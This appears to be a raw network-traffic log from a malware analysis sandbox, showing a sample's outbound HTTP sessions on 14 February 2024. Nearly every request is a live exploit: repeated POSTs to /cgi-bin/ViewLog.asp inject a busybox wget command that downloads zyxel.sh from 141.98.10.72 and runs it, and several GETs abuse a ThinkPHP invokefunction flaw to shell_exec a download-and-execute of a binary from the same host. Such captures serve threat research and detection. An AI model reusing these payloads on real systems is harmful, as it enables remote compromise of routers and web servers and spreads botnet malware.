                                                        Feb 14, 2024 09:33:20.483242035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        205192.168.2.145283895.86.64.1768080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:20.646713018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        206192.168.2.144501495.85.39.78080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.197647095 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        207192.168.2.144788431.136.18.1528080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.203150988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:24.456404924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:30.600101948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:42.631658077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:08.486450911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:57.636549950 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        208192.168.2.144607294.121.178.148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.248001099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        209192.168.2.145011831.200.121.1808080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.248162031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        210192.168.2.145619231.200.82.1538080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.249630928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        211192.168.2.1451522112.184.111.10980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.276432991 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:21.554538965 CET35INHTTP/1.0 301 Redirect
                                                        Feb 14, 2024 09:33:21.554989100 CET399INData Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 37 3a 33 33 3a 32 32 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74
                                                        Data Ascii: Server: GoAhead-WebsDate: Wed Feb 14 17:33:22 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        212192.168.2.1436546112.124.19.22680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.370388985 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:21.689197063 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        213192.168.2.144051495.142.121.528080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.400969982 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        214192.168.2.143841085.118.201.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.413136959 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:21.640768051 CET511INHTTP/1.1 404
                                                        Set-Cookie: JSESSIONID=8F01D9BEC313603E3CC49FCAFA2CE99A; Path=/; HttpOnly
                                                        Set-Cookie: uisec=d65d284a-de44-4e44-9101-f799b619a42e; Path=/
                                                        Content-Type: text/html;charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Date: Wed, 14 Feb 2024 08:33:21 GMT
                                                        Keep-Alive: timeout=20
                                                        Connection: keep-alive
                                                        Data Raw: 62 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 0a 09 54 68 65 20 55 52 4c 20 79 6f 75 20 74 72 69 65 64 20 74 6f 20 72 65 61 63 68 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                        Data Ascii: b9<!DOCTYPE html><html><head><meta charset="utf-8" /><title>404 Not Found</title></head><body><h1>404 Not Found</h1>The URL you tried to reach was not found.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        215192.168.2.1453172112.15.125.680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.414980888 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:21.821935892 CET358INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 213
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 64 78 2d 6c 74 2d 79 64 2d 7a 68 65 6a 69 61 6e 67 2d 68 75 7a 68 6f 75 2d 33 2d 31 38 33 2d 31 33 31 2d 31 38 31 2d 37 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>dx-lt-yd-zhejiang-huzhou-3-183-131-181-7</center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        216192.168.2.144432694.137.97.2168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.416438103 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:21.635879993 CET274INHTTP/1.0 200 OK
                                                        Server: httpd/2.0
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        Date: Wed, 14 Feb 2024 08:33:21 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        217192.168.2.144413694.122.109.848080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.444539070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        218192.168.2.145855694.123.125.88080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.445549011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        219192.168.2.145242231.200.65.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.445915937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        220192.168.2.143589662.29.12.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.447084904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        221192.168.2.145377294.120.51.378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.447279930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        222192.168.2.1436188112.166.123.15980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.646574020 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:21.922766924 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:23 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        223192.168.2.1454858112.90.157.13380
                                                        TimestampBytes transferredDirectionData
